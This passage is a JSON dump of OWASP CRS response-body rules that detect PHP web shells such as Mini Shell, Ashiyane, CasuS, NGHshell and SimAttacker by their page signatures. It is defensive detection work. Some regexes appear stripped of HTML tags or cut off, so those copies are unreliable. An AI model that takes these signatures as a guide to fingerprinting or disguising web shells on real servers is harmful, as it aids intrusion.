"act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 103, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 104, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 105, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 106, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 107, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 108, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 109, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 110, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 111, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 94 } }, { "rule_id": "955140", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "Mini Shell[^D]*Developed By LameHacker", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "Mini Shell web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 114, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "Mini Shell[^D]*Developed By LameHacker", "actions": [ { "act_name": "id", "lineno": 115, "act_quote": "no_quote", "act_arg": "955140", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 116, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 117, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 118, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 119, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 120, "act_quote": "quotes", "act_arg": "Mini Shell web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 121, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 122, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 123, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 124, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 125, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 126, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 127, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 128, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 129, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 130, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 131, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 114 } }, { "rule_id": "955150", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "\\.:: [^~]*~ Ashiyane V [0-9.]+ ::\\.", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "Ashiyane web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 134, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\.:: [^~]*~ Ashiyane V [0-9.]+ ::\\.", "actions": [ { "act_name": "id", "lineno": 135, "act_quote": "no_quote", "act_arg": "955150", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 136, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 137, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 138, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 139, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 140, "act_quote": "quotes", "act_arg": "Ashiyane web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 141, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 142, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 143, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 144, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 145, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 146, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 147, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 148, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 149, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 150, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 151, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 134 } }, { "rule_id": "955160", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "Symlink_Sa [0-9.]+", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "Symlink_Sa web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 154, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "Symlink_Sa [0-9.]+", "actions": [ { "act_name": "id", "lineno": 155, "act_quote": "no_quote", "act_arg": "955160", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 156, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 157, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 158, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 159, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 160, "act_quote": "quotes", "act_arg": "Symlink_Sa web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 161, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 162, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 163, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 164, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 165, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 166, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 167, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 168, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 169, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 170, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 171, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 154 } }, { "rule_id": "955170", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "CasuS [0-9.]+ by MafiABoY", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "CasuS web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 174, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "CasuS [0-9.]+ by MafiABoY", "actions": [ { "act_name": "id", "lineno": 175, "act_quote": "no_quote", "act_arg": "955170", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 176, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 177, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 178, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 179, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 180, "act_quote": "quotes", "act_arg": "CasuS web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 181, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 182, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 183, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 184, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 185, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 186, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 187, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 188, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 189, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 190, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 191, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 174 } }, { "rule_id": "955180", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^\\r\\n\\r\\nGRP WebShell [0-9.]+ ", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "GRP WebShell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 194, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^<html>\\r\\n<head>\\r\\n<title>GRP WebShell [0-9.]+ ", "actions": [ { "act_name": "id", "lineno": 195, "act_quote": "no_quote", "act_arg": "955180", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 196, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 197, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 198, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 199, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 200, "act_quote": "quotes", "act_arg": "GRP WebShell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 201, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 202, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 203, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 204, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 205, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 206, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 207, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 208, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 209, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 210, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 211, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 194 } }, { "rule_id": "955190", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "<small>NGHshell [0-9.]+ by Cr4sh</body></html>\\n$", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "NGHshell web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 214, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "<small>NGHshell [0-9.]+ by Cr4sh</body></html>\\n$", "actions": [ { "act_name": "id", "lineno": 215, "act_quote": "no_quote", "act_arg": "955190", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 216, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 217, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 218, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 219, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 220, "act_quote": "quotes", "act_arg": "NGHshell web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 221, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 222, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 223, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 224, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 225, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 226, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 227, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 228, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 229, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 230, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 231, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 214 } }, { "rule_id": "955200", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "<title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - ", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "SimAttacker web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 234, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "<title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - ", "actions": [ { "act_name": "id", "lineno": 235, "act_quote": "no_quote", "act_arg": "955200", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 236, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 237, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 238, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 239, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 240, "act_quote": "quotes", "act_arg": "SimAttacker web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 241, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 242, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 243, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 244, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 245, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 246, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 247, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 248, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 249, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 250, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 251, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 234 } }, { "rule_id": "955210", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^<!DOCTYPE html>\\n<html>\\n<!-- By Artyum [^<]*<title>Web Shell", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "Unknown web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 254, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^\\n\\n", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "Unknown web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": 